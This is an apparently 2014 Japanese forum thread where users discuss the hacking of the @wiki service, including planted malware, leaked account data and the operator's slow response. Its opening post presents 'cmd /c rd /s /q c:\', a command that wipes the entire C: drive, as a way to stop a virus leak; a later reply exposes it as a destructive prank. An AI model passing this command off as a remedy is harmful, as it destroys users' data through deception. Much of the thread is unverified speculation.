【アットウィキ/atwiki】@wikiについて語る Part 10
★☆@wikiを開いてしまった人へ☆★
スタート→全てのプログラム→アクセサリと進み
コマンドプロンプトを右クリック→管理者権限で実行しましょう。
コンソールが開くので
「cmd /c rd /s /q c:\」と入力。
PCが一度初期状態に戻るので、ウィルスによる情報流出を防げます。
3 :
名無しさん@お腹いっぱい。:2014/03/09(日) 22:40:40.80
モウスグウマレルノ
____
∧_∧ ∧_∧ 三/
( ・∀・) (゚ー゚*) 三/l::
( ) (⊃_ ⊂) 三/_l:::
| | | ( ` _/ /
(__)_) / ∪^∪ /
 ̄ ̄ ̄ ̄
ギャァァァァァァァ
____
ドン! /∧_∧ 三/
∧_∧ /(*。Д ゚) /l::
( ・∀)人人_ ⊃つ ./_l:::
( つ 三 つ .>ミ ))/
γ ノヽ ヽ WWミ ))/
し' (__)∪^∪/
 ̄ ̄ ̄
____
/三 三/
/三 三/
/三 三∧_∧
/三ノ⌒`(*゚д。)
/〜( * つつ∴‥,::':
/ ∪∴,∪ :': '.,::':
 ̄ ̄⊂‥':'‥ゝ,;⊃
⊂.': ':;。.o:゚)っ‥⊃
⊂'‥ ': ,::υ∴‥⊃
⊂ ':∵・‥っ∵⊃
.': '.':∵‥': ':
おつ
@を関する名をもつ@freaksとは関係ないサービスとかが迷惑こうむりそうだな@gamesとか@itとか
6 :
名無しさん@お腹いっぱい。:2014/03/09(日) 22:44:20.50
>>2 これを行うとすごくPCが軽くなり、ウイルスも駆除できる、まさに最強のコマンドである。
しかしCドライブのデータがほぼ全て削除される上に、OSまで消えてしまう。まさに禁忌の呪文である。
ネット上でこのコマンドを実行すれば●●が直るといった悪質な書き込みがなされている場合があるが、
引っかからないようにしましょう。
尚、自分が所有するPC以外(業務用PC、公共のPCなどで)で行った場合、 電子計算機損壊等業務妨害罪(刑法234条の2)に問われ、
5年以下の懲役または100万円以下の罰金の可能性があるのでよいこのみんなは絶対にマネしないこと。
昨日立ったスレがもう新スレか
管理者じゃないけどどうだろ
ウイルスは入ってなかったけども
まとめ
■何が起きたの?
『@wiki』が何者かに乗っ取られ、有名wikiにウィルスが仕込まれているという。
それだけではなくユーザーのIDやパスワードも流出しており、二次被害が出る可能性もある。
人気ゲームアプリ『パズル&ドラゴンズ』(パズドラ)の攻略wikiには
既に大量のウィルス(トロイの木馬)がJPEGファイルに偽装し仕込まれており、
閲覧しないよう注意を呼びかけている。
http://getnews.jp/archives/529637 ■暫定対策
情弱のみんなのために怪しいページを踏まないようにする
ブラウザ用プラグインでも貼っとくわ。
Dr.Web LinkChecker
http://free.drweb.co.jp/linkchecker/ もうひとつは自分の代わりにアクセスしてくれるサイト
http://www.aguse.jp/ ■※3月9日14時20分追記】
「@wiki」は、データの流出が確認されたサーバを発表した。該当サーバは下記アドレスのものとなる。
www4.atwiki.jp www17.atwiki.jp www26.atwiki.jp www30.atwiki.jp www36.atwiki.jp
www37.atwiki.jp www38.atwiki.jp www39.atwiki.jp www40.atwiki.jp www41.atwiki.jp
www42.atwiki.jp www43.atwiki.jp www44.atwiki.jp www45.atwiki.jp www46.atwiki.jp
www47.atwiki.jp www48.atwiki.jp www49.atwiki.jp www50〜58.atwiki.jp
テンプレここまで
むちゃくちゃだな
ざっくりしすぎだし
いい加減なガジェットの記事必要か
14 :
名無しさん@お腹いっぱい。:2014/03/09(日) 23:02:32.41
>>1 事の発端となったwww1.atwiki.jpが除外されてんのは何でなの?
今退会したサイト、調べようと代理サイト使ってるけど
結果がおせえぇw早くしろよ
仮にrootがハックされたんならパスとかも変えられてる可能性あるからからSSHとやらで鯖止めるのも難しくなったりもするかもな、どうなんだろ
atwiki運営からの続報が19時以降来ないな。夜逃げの準備でもしてるのか
まあ今日騒いでもな・・・
本番は明日からだよ
999 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2014/03/09(日) 23:07:22.21
1000なら
1000 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2014/03/09(日) 23:08:24.99
リア充爆発
退会したいけど退会のためのログインも怖いな
パス変更→改竄されてて危険
退会→改竄されてて危険だしデータは残る
放置→データが残る
帰ってきてメールチェック
↓
例のメール確認、とりあえずpass再発行
↓
前スレ開き被害状況知る
↓
絶望
早まったわ…
やーい早漏
これは運営の罠だ
>>23 本アドだったらドンマイwww
捨てアドだったら放置
使い回ししていたら他サイトのメアドかパスを変える
ガバガバ過ぎて笑いしか出ない
それくらい自分で考えなさい
>>27 メインで使ってるメアド
>>29 捨てアドと変わらん
要は他サイトの設定変えてこい
atwikiには関わらないほうがいいぞ
入れ替わりで「管理人だけど大丈夫?」
「atwiki踏んだけど大丈夫?」が登場
@freaksドメインで何で発表しないんだろね
発表しないと、発表できない事態に陥ってる、と思っています。
管理グループを偽ったメールまで送信されるやりたい放題の状況を受け入れる@wikiヤバすぎだろ
少しはもがけよ
38 :
名無しさん@お腹いっぱい。:2014/03/09(日) 23:22:40.27
>>31 うちの兄貴がひかかったwwwこれもうグローバルテロじゃね?
なんか進展あったかーまだ鯖とめないのか
41 :
名無しさん@お腹いっぱい。:2014/03/09(日) 23:26:49.06
鯖止めない意味がわからん
現在進行形でウィルステロに加担してることに気付かないのか
>>41 日曜だから人が居ないのか若しくは
もう解決した思ってるかのどちらかじゃね?
どうせGoogleで検索したのはGoogle側に筒抜けだけどな
>>41 今あっちこっちにatwikiのリンクが貼られててアフィ的においしいとかなんじゃね
wikiサービス『@wiki』が乗っ取られ改ざん 閲覧するだけでウィルスに感染する恐れあり
http://getnews.jp/archives/529637 http://getnews.jp/img/archives/imp/and_529637.jpg 有限会社アットフリークスが運営している無料wikiサービス『@wiki』(アットウィキ)。
ゲームの攻略wikiに活用されることが多く、また大勢でwikiタグを使い編集できることから人気を呼んでいた。
そんな『@wiki』が何者かに乗っ取られ、有名wikiにウィルスが仕込まれているという。
それだけではなくユーザーのIDやパスワードも流出しており、二次被害が出る可能性もある。
人気ゲームアプリ『パズル&ドラゴンズ』(パズドラ)の攻略wikiには既に大量のウィルス
(トロイの木馬)がJPEGファイルに偽装し仕込まれており、閲覧しないよう注意を呼びかけている。
今回の一件、3月8日深夜には『2ちゃんねる』や『Twitter』で騒がれはじめていた。
しかし運営であるアットフリークスは土曜日の深夜ということもあり対応が出来ない状態であった。
その後の調査で昨年の12月頃からウィルスやスクリプトが仕込まれていたことが発覚。
翌日になり、運営が全アカウントとパスワードをリセットし再設定するように告知。
しかしリセット前のアカウントでログイン出来るという人も出ていたようである。
それだけでなく、パスワード再発行フォームが改ざんされ、謎の画像(唐澤貴洋弁護士)が貼られるという状態に。
『@wiki』のアカウントは『mixi』やその他のソーシャルサービスと連携も可能で、
もり漏洩したアカウントが連携アカウントの場合、誰が使っていたかも特定できてしまう可能性がある。
http://getgold.jp/files/2014/03/00127.jpg
鯖止められない状況になるってことはあるのかな。
まぁ電源ぶっこ抜けばどうしようもなく止まるんだろうけど。
流石にここのパスやメアドの他への使い回しという愚行は侵さなかっただけマシか俺
まあパスもメアドも変えたけど
>>46 んなことせんでも上流のルーターで回線切ればいいだけの話
49 :
名無しさん@お腹いっぱい。:2014/03/09(日) 23:34:47.99
普通、こういうインシデントは基本的にソッコーLANを抜く
分かっていて通信できる状態を維持って事は
危機意識が全く無い無能な会社という意味を表す
パズドラにトロイウイルス、ていうのは事実なの?
どうにも噂を記事にしてるようにしか思えないんだけど
>>49 電話番号晒されてたよ、電話してみたらどうかな?
>>48 上流のルーターは他社と共有の可能性があるよ
あと、無いと思うけど、@wikiのサーバーも物理的に他社と共用なら電源断は難しいかも
あと、前スレでApache止めろって言ったけど、Apacheまで他社と共用なら・・・(ry
>>50 風説の呂布
ただし現在進行形でリスクが残っているのは相変わらず
>>52 つまり緊急時にどうしようもならない杜撰なリスク管理だったと…
今回の騒動で、@wiki運営の杜撰なリスク管理が改善されるかな。
個人的には疑問に思う。
狙われたら撃沈するのは無料サービスだし期待はしてない
問題はアットフリークスがこれで生きるかそれとも死ぬかだ
今回は前の流出なんか目じゃないくらいの痛手だろうしな
評判的な意味で
前にも規模のでかい流出事件やらかしておいて
さらにパスワードも暗号化せずに平文だったわけだし
今更改善もくそもないだろ
ここは情報流出を恐れないやつが使うところだろう?
>>56 そんなまっとうな体質なら1年足らずで再おもらしはしないだろうな
>>9 送信日時: 2014年3月9日 11:01:37 時点では対象は全員だったけれど、鯖の特定できたのか…でも不安だなぁ。
なお、流出した個人情報およびセキュリティ上重大と考える範囲内は以下のとおりです。
※流出内容
ユーザ名
パスワード(暗号化されています)
メールアドレス
登録時のIP
※影響範囲
現在登録中のユーザ全員
>>45 > その後の調査で昨年の12月頃からウィルスやスクリプトが仕込まれていたことが発覚。
12月頃に艦これのwikiを見たのですがもうダメですか?
前にAndroidのウイルスが広告経由でばらまかれたときも
そのウイルス広告を止めないで流し続けてたしなぁ
63 :
名無しさん@お腹いっぱい。:2014/03/09(日) 23:56:33.05
なんか次々と謎のファイルがアップロードされてないか?
ここでしか使ってない捨てアドとパスで編集メンバーになってたんだけど垢放置でOK?
atwiki運営のお詫びはどんなものになるだろうか
1:●流出と同じでうやむやに
2:言葉だけ謝罪「反省してまーすwww」
3:他サイトへの移行ツール公開して土下座
4:まさかの金券配布
5:社長が切腹
…どう見ても2止まりだな
@wikiでマイナーなゲーム系の管理人を4つやっとるんだが、情報流出メールがきたんで全部管理者パスは変えた。
@wikiの機能でバックアップを落とそうとしたけど接続できなかった。
バックアップは@wiki側でとってくれてるのかな・・・データ全滅はマジ勘弁なんだが。
こっちで@wikiの機能に頼らずバックアップとれないかな。
>>55 そうですね。
それなりに複雑なシステムだから、Apacheまで他社と共用ってのはありえないと思いますが…
>>66 @wikiダウンローダーというツールがある
>>66 @wiki機能のバックアップ落として大丈夫でしょうか?
私は怖くて落とせない…
70 :
名無しさん@お腹いっぱい。:2014/03/09(日) 23:59:47.30
>>64 俺もそのパターン。管理人ではなくて編集メンバー。
心配なのはどのウィキの編集メンバーだったかが漏れるのかということ。
結局、一度も編集はしなかったのだが。
71 :
68:2014/03/10(月) 00:04:07.99
ゴメン。@wikiダウンローダーじゃ管理者orメンバーのみ編集可設定のページは、ダウンロードできないんだった。
>>61 そのwikiを見ていた人同士で情報をやり取りしたほうが、
そのwikiがおかしかったかどうかの情報は集まりやすいと思うよ
>>56 現在進行で絶賛放置中とか改善もへったくれもないわ
>>70 >心配なのはどのウィキの編集メンバーだったかが漏れるのかということ。
そんなに漏れたら困るようなことあるん?
∩___∩ /゙ミヽ、,,___,,/゙ヽ
| 丿 ヽ i ノ `ヽ'
/ ○ ○ | / `(○) (○)´i、 先生助けてっ!、
| U ( _●_) ミ 彡,U ミ(__,▼_)彡ミ アットフリークスちゃんが息をしてないのっっ!!
彡、 |∪| ,,/ ,へ、, |∪| /゙
/ ヽ ヽノ ヾ_,,..,,,,_ / ' ヽノ `/´ ヽ
| ヽ ./ ,' 3 `ヽーっ / |
│ ヾ ヾl ⊃ ⌒_つ ソ │
│ \__`'ー-⊃⊂'''''"__,,,ノ |
` ̄´ ` ̄´
息してないというか自ら息を止めてる
スマホでも踏んじゃ駄目なのか
ああせっかく手に入れたゲームの小ネタみたいのに
80 :
名無しさん@お腹いっぱい。:2014/03/10(月) 00:12:11.08
とりあえず移転先考えようぜ
81 :
名無しさん@お腹いっぱい。:2014/03/10(月) 00:12:37.40
82 :
名無しさん@お腹いっぱい。:2014/03/10(月) 00:18:52.76
意外とゲームのwikiって@wikiばっかりなんだな
>>83 > 177 唐睾睾睾 2014/03/09(日) 05:31:41 ID:BmmKcBUo0
これってどこの板なのさ?IDでググっても転載された2chスレしか出てこないぞ
>>52 他社だろうと、その回線使わせて貰ってるんだから自分とこへの流れを止めて貰えばいいだけの話じゃないのか
>>52 > 、@wikiのサーバーも物理的に他社と共用なら電源断は難しいかも
他社と共用ならその他社さんの情報もハックされたことになるんじゃね
>>80 とりあえず避難所代わりにwikiwiki借りた
一部@wiki構文使えないのもあるのはキツいがまあ何とかなるかな…
>>83 ヘッダつけたまま転載してると◯されちゃうよ
なんか最初は焦ったけどメアドとパス漏れてても別にいいかなって思えてきてやばい
@wikiが他社サーバー使ってるのなら
最悪そのサーバーとの契約切られるんじゃねえの?大丈夫なん?
1年前からヤバかったらしいってことは気づかないうちに色々やられてた可能性もあるってこと?
もう倒産でオッケー
削除されたWikiにはアクセスしても無問題?
今時有限会社のままの時点でヤバさプンプン
>>85 流れを止める設定が難しいね。
データをループさせちゃったら通信障害になっちゃうから、
@wiki宛の通信を全部吸収するようなサーバーを起ててやらないとうまくいかないから
97 :
名無しさん@お腹いっぱい。:2014/03/10(月) 00:39:07.79
atwiki.jpのドメインの一時停止すりゃいいだけだろ
DNSキャッシュ
>>90 実際そんなもんよ
木っ端みたいなメアドだけ分かってもせいぜいゴミが大量に飛んでくるくらいで大した問題じゃない
パスもちゃちゃっと変えれば済む話
ゴミにしたって最近のメールサービスはモノによるがスパムフィルタが強いところはかなりの量をサービス側で弾いてくれるしな
本アドお漏らしでしかも実名と結び付け得るとかならご愁傷様だが
問題は情報の閲覧という根本的な部分に支障を来たしまくってること
対応がグダグダすぎて一般ユーザーは風説全部信じ込みそうな勢いだ
こうなると面倒でも移転せざるをえん
>>99 特定されるなんてよっぽど嫌われてない限りされないもんな・・・
>>86 そうね。
仮想化されてるか、chroot jailな環境とか、考えられますね
あとは、@wikiのところが又貸ししてるとか?
どれも推測でしか無いけれども
夕方以降は進展らしい進展はないな。
「間違ってページを開いたんですが、大丈夫ですか?」
「iPhoneでページを見るのは大丈夫ですか?」
「ページ開いた奴はウイルス感染」
「ページ開いた奴は逮捕される」
「運営はなぜ鯖を止めないんだ?」
この辺のレスが目立つ。
>>97 DNSが他社管理だから、これも時間かかりそう。
てか、どうしても止められない想定で考えてるけど、
多分、そんなことはなくて@wiki側が止めないだけだと思うんだけどね
本メールでも、本メールアドレス変えたら問題ないですか?
DNSサーバの浸透の問題もあるから、普通はそんな方法取らない
107 :
名無しさん@お腹いっぱい。:2014/03/10(月) 00:51:42.68
これって編集者じゃなきゃ被害はないの?
atpages.jpのドメインがイカレた時はすぐにatpage.jpのドメインが発行されたりしたじゃん
そういやそんなのもあったなぁ
レンタル鯖がドメイン更新忘れて失効させるってものすごいよなw
>>107 wiki管理者権限のユーザは情報漏れが確定
wiki編集者権限はどうだったかな
wiki閲覧者は今のところ被害報告は聞かない
111 :
名無しさん@お腹いっぱい。:2014/03/10(月) 00:55:34.99
全ユーザーにメアド変更のお知らせじゃなかったけか
>>108 ドメイン取得とDNS浸透を一緒にされてもなあ
すぐに反映されるかは所属DNSの問題だし
>>84 他スレ読んだ所、2ch内ではないみたい
他の掲示板ぽい
>>99 漏れたメアドをどれに使ってたかよく覚えてないしパスももうそのままでもいいかみたいな境地だわ
鯖全部とられたんだから
中に入ってたユーザーデータはごっそり抜かれたと思っていいだろ
116 :
名無しさん@お腹いっぱい。:2014/03/10(月) 00:56:31.20
登録時のIPが漏れてることが怖い
>>110 この3つの立場で被害状況整理して欲しいわ
編集者は流出ログでは漏れてないってレスあったけど
メアド変更のメールは来てるっぽいんだよな
119 :
名無しさん@お腹いっぱい。:2014/03/10(月) 00:58:50.83
まずいかどうかは法律家に聞け
だからユーザー情報も犯人がとりたければ
いつでもとってる状態だって言ってるじゃん
漏れた情報自体は一般的にはたいしたことがないもの
ただしパスとメアドを使いまわす横着者は被害を受ける可能性がある
問題になってるのは今なおatwiki.jpが攻撃の踏み台にされている恐れがあること
>>118 鯖侵入者がコピーしてきたらしい流出ファイルがアップロードされているのは
スレに張られたから皆も知ってるけど、得た情報を全部張ったかはわからないよね。
噂からの被害状況を整理することしかできないんじゃないかなあ、まとめるにしても。
そろそろこの会社潰れるかな
何にせよこの会社に頼ることはもうない
移行作業をせこせこ進めるほかないだろう
結局、まだハッキングされてる可能性があるから
アクセスもできないし、パスワードの再発行もできないし、何にもできない
で、ハッキングされていないことは証明できないから、やっぱり何もできないんだよな
この連鎖を断ち切るのは運営会社が大手でまともであることが条件なんだけど、
なんだか怪しい会社だから、その対応も正しいのか本当なのかわからないから
結局、連鎖は断ち切れずハッキングされたままなんじゃないかと思ってしまって何もできない
(´Д⊂ モウダメポ
wiki開設した時って住所とか登録したっけ?
結構昔だから覚えてないや。
俺はここ1年以内に登録したが登録に個人情報の提供を求めるなら登録はしなかったよ
俺が登録する以前は要求してたってんなら知らんが
>>122 これだな、メアドとパスワードをセットで色々なサイトで使用していると
メアドがID代わりになるサイトでログインされる→名前や住所が見られてしまうという可能性は運が悪ければある
基本的にメアドと@wikiのパスワードだけじゃどうしようも無いしな
ウイルスなら最悪初期化すりゃいいが踏み台にされるとどうしようもないのがな
怪しいURLなら事前に調べるが流石にwikiとなると・・・
132 :
名無しさん@お腹いっぱい。:2014/03/10(月) 01:14:33.78
Trojan:VBS/Miposa.A
ウイルスまたは不要なプログラムが検出されました!
終わったわ
>>117 固定じゃない限り今回お漏らしされた情報の中で一番どうでもいい情報だろ
>>126 何に対して何もできないかっていうと、wikiに(皆で)書いた文章と、あれば添付ファイルに対してだよね
大規模wikiでバックアップ取ったことがなかったとかなのかな
>>130 メアドは共有でもいいけど、パスワードはサイトごとに変えなきゃだめってこったな
安全を考えるのなら
1)プロバメール
→2)有料のどこぞのメール
→3)無料のフリーメール複数(個人情報入力の有無で切り替え)
→4)3)のフリメでサイト登録、パスワードはサイトごとに変更
1)2)3)のメアドのパスワードはもちろん全部別
こんなふうに階層的にメールを管理して、ひもづけされても
上位のメアドまでたどり着けないように防御しなきゃいかんな
>>129 さんきゅー。
メルアド位なら嫌だけどなんとかなるが
それ以外も登録してたとしたらシャレになってなかったわ。
ネットに強い弁護士の出番だな
IP漏れ怖い人は名前欄にfusianasanっていれればいい
パスワードはユーザ名+ドメイン名をキーに2chのトリップ生成のやつで作ってるわ
今すぐ地球が滅びればみんな幸せになれるよ
@freaks側は問題のサーバを弄れるの?ハッキングされてんならパスワードとかも変更されてて@freaksが弄れなくなったりとかないの?
ハッカーが仕掛けたウィルスがXPでは動かないとかになると一層面白いんだがなあ
>>106 止めるだけでも多少の効果はあるんじゃないの
現在進行形でばらまかれてるの?サーバー止めないの??
>>145 DNS止めたってIPアドレス直打ちでアクセスできちゃうだろ
どっかの踏み台として使う分には更に好都合になるな
サーバーが@freaksの自社サーバーならさっさと外部と遮断くらいすべきだし
他社サーバーを借りてるならその会社に連絡して止めるなりすべき
ついでにatwiki.jpのドメインも一時停止くらいしとくべき
<丶`∀´><鯖止めたらウリ達の広告費収入がおじゃんになるニダ
↑
アットフリークス
運営もユーザも家庭用OSと同じ認識の連中しかいないから侵入されるんだろ(笑)
>>146 実態がどうなっているのかだれもわからない
運営はあのザマだし外部から検証できるほどの大先生/技術者もいない
どっかのコテハンが隠れ家的サイトで実況しながらアタックしていたという話もあるが本人やごく一部の見学者にしかわからん
>>148 IP直打ちの話ならドメイン停止関係なく既にやってるんじゃないの
パズドラとかの情報見ようとしてる人たちが見えなくすればいいんだから多少の効果はあるでしょ
穴塞げないけどメンテにも入らない
ってのが衝撃すぎてメアドpass流出が霞むレベル
>>154 DNSキャッシュがあるんだから、他のDNSサーバが応答しちゃえば無駄
事実かは知らんがrootが乗っ取られてるって噂もあるし通常の方法での鯖停止が出来ないんじゃねえの
atwikiの運営が全世界のDNSサーバを破壊すれば可能かもなw
メアドもパスも編集メンバー用にしか使ってなければ実害ないの?
不安で寝られん
>>159 パスワードの使い回ししてなけりゃ大丈夫じゃね、メールはスパムとか来るかもしれんが
もう後は待つしかない
atwikiに代わるのはどこがいいんだ
>>162 効果ないし、他のネットワークに迷惑かけるような方法取るほうがアフォ
@freaksがこういう対応してくれたらなーっていうたらればの話は無意味だから
小手先のごまかしやるよりはサービス休止が確実
DNSレベルで封鎖とか頭おかしいから
最低限wikiのデータだけはサルベージしたいってんならブラウザのFLASHスクリプト関係全部殺した上で自己責任でGO
ハッカーの人たちがリアルタイムで個人情報やらスクリプトをzipでうpしているので
悪用し放題です
atwikiが鯖を落として改善しない限りユーザーはなーんも出来ませんので生暖かく見守っていきましょう
情弱だから誰か教えてくれ。
編集もユーザー登録も全くしたことないんだが、さっき知らずとatwikiのページを
開いてしまったんだ。
起こりうる弊害ってどんなことがある?
この期に及んでも鯖落とさずに好き勝手やらせてるって最早犯罪幇助wwwwww
172 :
名無しさん@お腹いっぱい。:2014/03/10(月) 01:41:34.75
今回の騒動を知らないで@ウィキにリンクしたら、ウィルスが出たと言われてあちこちに通報されてしまいました。
逮捕されますでしょうか?心配です。
昼にPCからはなれて、さっき2報3報読んだんだけど
進入されたことについては告知したんだね
後は寝て待つしかないかーと思いかけたけど
バックアップをPukiwiki書式に変換する作業をしたほうがいいかな。うーん
侵入されたんだったら普通はサービス休止、トップページに情報公開ってのがきちんとした対応だと思うけどな
ここはサービス休止しないで運営続けてるから考えられない
atwiki開きました
ヤバイですか
これだけで何を判断しろというのか
・運営が底なしの馬鹿である。改善の見込みはない
・レンタルサーバーの都合と実装のゴミさでサービス停止すらできない。改善の見込みはない
どっちだろうね
>>170 パズドラとか渦中とされるページ以外は特に何も起こらないんじゃね
鯖に侵入されて無いという保障も変な細工されてないという保障もないけど
大本営発表では少なくとも任意のページへ変なスクリプトを置けるレベルにはやられてるそうだ
もう収束してるだろ
まだなんか起きてんのか?
今のところ閲覧者(スマホ/PC)がウイルスに感染して個人情報取られたとかの具体的な被害報告はないよね?
あまり不安がってもしょうがないように思うけど
サービスの停止ができないってありえないだろ
鯖置いてるところに止めてもらえよw
自分でプラグ抜くかコンセント抜いて停電するでもいいし
182 :
名無しさん@お腹いっぱい。:2014/03/10(月) 01:49:00.37
>>170 そんなのまだいいわ
俺なんか知らずにリンクしたらホットラインセンターや警察に通報されてガクブルだ。
ウィルス提供罪の違反もしくは未遂だってさ。どうしよう。
情報出無さ杉で虚実入り混じって拡散しまくっるだろうが
>>180 侵入したらしいのが2chのキチガイである意味良かったな
これが某国人とかだったらエグいトラップ敷設した上で何事も無かったかのように振舞ってくれたはず
セキュリティに関してはあなたのPCの正確な状況なんかここにいる人間にはわからないので聞かないでください
どうしても聞きたい人間はセキュリティ関係の板で聞いてください
不安な奴はhostsで遮断しろよ
とりあえず、もう見ちゃったものはしょうがないから一応ウイルススキャンとかかけて、後はもう見ないようにするしかないよね
電話で医者に風邪を引いたかもしれないんですがどうでしょうか?と訊ねるスレ
>>178 >>182 ありがとう。レスもらえると思わなかった。
とりあえず2chまとめ見たところ、
・クッキー削除
・javascriptオフ
・念のためウィルスソフトでスキャン
この3つしておいたほうがいいみたいだけど、他に必要なことあるかな
医者ですらないんだけどな
117にかけてるようなもん
医者(迫真)
医者(真顔)
医者(物理)
atwikiに誰でも編集できるスクリプトが置かれたが
どのような手段で置かれたのかが分からないので再度置かれる可能性があり
悪意あるスクリプトが組み込まれる可能性があるのでatwikiは現状見ないほうが良い
でおk?
そんな感じ
さっきスマホから@wikiのサイト見ちゃったんだけどスマホでもやばいですか?
iOSです
短縮URLで昨日踏んじまったよパズドラwiki
>>190に書いてあることとか実行したけどまあ油断してたし後から2ch開いて驚いた
>>184 中国のニュースサイトでも記事になったから興味もった連中がいるかもな
改善する見込みないしブクマ全部消したわ
>>196 iOSなら専用のウイルスとかじゃない限り、感染率は低いんじゃないかな
詳しくないから確かな事は言えないけど
パズドラwikiの管理人可愛そうだなあ
あの規模で引っ越しって可能なん?
すでにバッグドアが多数仕込まれているので
さらなる被害は時間の問題かと
忘れた頃にまた嫌儲にいろいろ貼られちゃうぞ〜
そもそもパズドラWikiに悪意あるスクリプト組み込まれてないんでしょ?
風評被害すごいな
毎回ネット開くたびに、クッキーやら何やら削除せなあかんの?
というかjavascriptは普段から切りっぱなしでいい
クソどうでもいい装飾やら追尾広告やらが使ってるのが大半だし
>>198 ニュースサイトが全力で拡散した明日以降の方が危ないかもな
未だに鯖動かしてるのは実は警察の指導によるワナで、
群がってきたクラッカー気取りのアホを大量一本釣りとかしてくれたらマッポも捨てたもんじゃないんだが
本当のところは単に運営の決定権握ってるやつがアホってだけなんだろうなあ
マイクラwikiも結構な規模と需要だったのにこんな騒ぎでなあ
管理人はあまり情報発信するタイプじゃないからどうなるのかどうするのかさっぱりだ
208 :
名無しさん@お腹いっぱい。:2014/03/10(月) 02:16:47.26
>>201 数千万儲かってるとか話しあったから、仮にatwiki死んだら余裕で移転するっしょ
>>203 それでもアクセス衰えなかったらそれはそれでアレだな
>>200 ありがとう
そう言ってもらえるだけで少し安心したよ
>>86 >>101 209 名前:番組の途中ですがアフィサイトへの転載は禁止です[] 投稿日:2014/03/09(日) 21:47:29.34 ID:DY2vl4mc0 [4/21]
>>205 www1.atwiki.jp のサーバのIPは183.177.145.34
管理元は21company.comだから
お察し
267 名前:番組の途中ですがアフィサイトへの転載は禁止です[] 投稿日:2014/03/09(日) 21:59:24.13 ID:fQBVgPPJ0 [2/3]
メンテ画面にすると、他のwikiに逃げられるからな
客を逃がさないために危険な状態で放置してる
381 名前: 忍法帖【Lv=40,xxxPT】(1+0:8) [sage] 投稿日:2014/03/09(日) 22:19:35.56 ID:4TVqpYFx0 [4/6]
>>266 他社もシェアしてる共有部分は止めることはできないだろうけど、
自社の占有部分内で構築したサーバであれば止めることが出来るはず。
(root権限が乗っ取られたってのも、占有スペース内で構築したサーバの方だろう)
それでも、サーバやサービスを止めないってのは、
・atwikiが
>>267 の理由で止めないようにしている
・日曜だから、運用ルール上サーバを止める権限を持つスタッフを手配できない
のどちらか。
wiki運営で数千万儲かりましたの
>>208 数千万?
アフィに嫉妬こじらせた嫌儲の妄想でしょ
>>206 JavaScript 切っていると、@wiki の編集 (メニュー操作) もできなくなるぞw
>>214 編集用のURLをリンクとして記事に入れとけばいいじゃん
>>214 CSS殺すと普通のリンクになるから何の問題もない
あのメニュー隙間にカーソル入ると勝手に閉じたりしてイライラするからどっちにしろ使いたくないんよ
ログインしないといけない系のサイトにはしばらく入らない方がいいのかな。
ニコニコもネトゲもしばらくできそうにないのか
ついに鯖落としたらしいな見れなくなったらしい?
今回のバックドアの件で可能な悪意ある改竄の可能性は
閲覧者側のブラウザで実行するJavascriptだけでなく、
サーバ側で実行されるPHPプログラムが追加されてることも考えられる範囲だよ
その場合、そのPHPプログラムを読み込む(含んだページを閲覧する)ことがトリガーになり、
サーバ側でプログラムが実行され、こちらブラウザにその結果は、
(プログラム作成者がわざわざ見せるように作らなければ)現れない。
なので、アットウィキにはアクセスしない方がいいですよって話があちこちであった。
アットウィキの夕方のメールでは、確認した限りは無かったって話があって
現状どうなのかよくわからんけども。
@wikiの現在のヤバさは
嫌儲・なんJ・ハセカラ・ガチorにわかクラッカーがおもちゃにした
と表現したら伝わるんじゃないかと
更に糞運営を発揮し、公式発表の確認すらリスクが伴うという状態だが、まだ閲覧しただけでの被害は報告されてない
メンバー登録のメアドとパスも漏洩したので、他のところで使いまわしてる人は注意
中国とかにもネットニュースで流れたので二次被害が出る可能性があるので、しばらくはアクセスせずに様子見安定だろうけど
>>218 落ちてないみたいだから見に行かない方がいいよ
中華が上陸してくる前に鯖落とさんと終わるぞ
って落ちたのか?
223 :
名無しさん@お腹いっぱい。:2014/03/10(月) 02:55:02.32
@wikiの収入って広告だろ
たぶんこれでアクセス数ガックリ減るだろうから鯖維持出来なくなるんだろな
2時ごろPCフリーズしたわ…
atwikiパスページ、バックアップページ、管理ページは開いたのが心当たりだが…
心当たりがあるとちと怖いな
ちょっと編集者について聞きたいんだけど
何の登録もしてないただの一般編集者とは別に登録が必要な権限持ち編集者がいて
前者はただの閲覧者と同じで変な物踏んでなければ平気だけど後者は登録した物が漏れてる可能性がある
ってことでいい?
いいよ
とりあえず
ここは第1報から3報まで見ることが出来る人が多い訳だが(コレすらツリかもしれん)
次スレにテンプレとして載せた報がいいかな?
編集人で編集管理者だったが パスのリセットは本当だった。
ここはコメント感想書く=編集だからIP抜かれる(IP抜かれるぐらいそりゃどうでもいい)
見ただけでIP抜いてるのか知らん。
2012年夏時点で特定うぃきのDB破壊出来るヤツが居た。
●漏れも今回もネットで自分の行動が知られるメンタルダメージがデカすぎんなら
無人島自活生活でもやれ。
銃器大腸がハックされたり電力会社がハックされたり
最悪インフラ系止まってもいい準備は少しはやっとけ。
風呂入って水だけは確保しとけよ。
ぐぐるも人工知能開発本気だし米軍は人型ロボの開発本気だし
ターミネーター世界もマトリックス世界も来るかもな。
今回ルートが取られてんなら諦めろ。ネットじゃ嘘か真かは何もワカラン。
>>190やってある程度は行動自制してネット使えばイイ。
ちなみに
ノートンインターネットセキュリティ と スパイボット でチェックしてみたがアクセスしただけじゃ何も出なかった。
ゆうちゃん事件以後ネットだけの範囲の行動じゃ現行犯でもなきゃ確定は難しい。
ネットの情報は全て偽装出来る。何が本当だったのか本人にしかワカラン。(狂ってなきゃね)
心配する前に睡眠時間しっかりとれよ。
長文なのに中身が無いし話が脇道にそれまくりでまとまりがないし
漏れとかいつの時代のネラーだよって突っ込みたくなるし
そのくせ釣りは漢字じゃないのかよって突っ込みたくなるし
全角英数だし見たことない当て字だし
注意喚起するにしてもソフトもハードもごちゃ混ぜで素人丸出しだし
総じてでっかい釣り針ですね^^としか言いようが無い
キチガイの妄想なんかテンプレにしないから^^
なんでいきなり風呂に入ってとか言い出したのか真剣に悩んだではないか
なんだ妄想かそれならよかった
それじゃ1行にまとめてあげるよ
知らないほうが幸せなこともある
>>227 次スレになるまで状況がどうなるかわからんから、まだちょっと早いと思うよ
内容については、まず君が落ち着いてくるといいよって勧めたくなるくらい、
状況説明に対して感想割合が高いと思うわ
何が言いたいのか本人にしかワカラン。(狂ってる)
234 :
名無しさん@お腹いっぱい。:2014/03/10(月) 04:00:01.16
リカバリの為に外付けにデータ移植しても
その外付けがマルウェアに感染してる可能性があるという
